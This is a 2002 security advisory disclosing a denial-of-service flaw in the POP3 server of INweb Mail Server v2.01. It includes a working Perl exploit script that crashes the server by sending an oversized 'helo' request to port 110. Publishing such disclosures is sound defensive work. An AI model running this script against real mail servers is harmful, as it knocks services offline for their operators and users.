-----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 - --[ INweb Mail Server v2.01 Denial of Service Vulnerability ]-- - --[ Type Denial of Service - --[ Release Date November 12, 2002 - --[ Product / Vendor The INweb Mail Server is a standard Internet POP3 and SMTP mail server that runs flawlessly under Windows 2000 and NT and other windows platforms. The INweb Mail Server provides numerous unique features for both small and large businesses as well as ISP's. This includes many facilities to handle spam and viruses. http://www.inwebmail.com - --[ Summary Memory corruption vulnerability exists in INweb Mail Server v2.01. The POP3 server included with INweb Mail Server does not properly handle some types of requests. By submitting a maliciously crafted request to the POP3 server, an attacker could crash the system, resulting in a denial of service. - --[ Exploit An exploit for this vulnerability exists and is available below. ==================== SNIP ==================== #!/usr/bin/perl -w use IO::Socket; $host = $ARGV[0]; $port = "110"; $evil = "A" x 16000; print "INweb Mail Server v2.01 Denial of Service Vulnerability by SecurityOffice\n"; print "Usage: $0 host\n"; print "Connecting...\n"; $socket = IO::Socket::INET-> new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Connection failed.\n"; print "Attacking...\n"; print $socket "helo:$evil\n\n"; close($socket); print "\nConnection closed. Finished.\n\n"; ==================== SNIP ==================== - --[ Tested INweb Mail Server v2.01 / Windows 2000 sp3 - --[ Vulnerable INweb Mail Server v2.01 / Windows 2000 sp3 - --[ Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. - --[ Author Tamer Sahin ts@securityoffice.net http://www.securityoffice.net All our advisories can be viewed at http://www.securityoffice.net/articles/ Please send suggestions, updates, and comments to feedback@securityoffice.net (c) 2002 SecurityOffice This Security Advisory may be reproduced and distributed, provided that this Security Advisory is not modified in any way and is attributed to SecurityOffice and provided that such reproduction and distribution is performed for non-commercial purposes. Tamer Sahin http://www.securityoffice.net -----BEGIN PGP SIGNATURE----- Version: 2.6 iQEVAwUAPdEmHPpL5ibJRTtBAQHvDAf/YO13r8TkwFMuYEXgdHxaTmRtkUGn1CX2 3biZlvU/9XU6Y36S3tPzVVQiQuhMcNJ3EyRMVHi5OcanrT6uOrp0jQExh5SRMPH/ Y4wPN0Pm+f7gLLxAjp1uuvKR/NwaMTkgklrxAyM3Ek/kqS4Vh4t87d/nohAzOKa2 nLoK2P39ngwTRF/Sg04xsAXDLd7/RQ/cC7z7I/DbFPa17OYBUhciw/+wYKe+bo4u FvXXPhcQnq8g8EJWfq1qHbEMYdXJrmhRudzIyVWQBSuw9+jX5qjvfh/09ZqS1I+Q Vvk556SO9/NF+mgMose0YZ/76Ck5ippZjgKzpppud1JfljV3D+YyiA== =z6ly -----END PGP SIGNATURE-----